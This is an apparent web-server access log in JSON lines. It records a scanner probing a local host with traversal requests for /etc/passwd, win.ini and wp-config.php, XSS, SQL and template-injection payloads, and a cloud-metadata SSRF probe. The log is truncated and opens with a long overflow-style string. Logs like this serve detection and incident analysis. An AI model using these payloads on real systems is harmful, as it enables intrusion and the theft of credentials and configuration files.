AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.044","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\x5C&refurl=}}};alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.038","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.381","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2021/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'29K6Bgmap6EuBOfnUmYx8kG44i7'); INSERT INTO extra_field_options(option_value) VALUES ('29K6Bgmap6EuBOfnUmYx8kG44i7'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '29K6Bgmap6EuBOfnUmYx8kG44i7', 16,0) ON DUPLICATE KEY UPDATE tag='29K6Bgmap6EuBOfnUmYx8kG44i7', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login 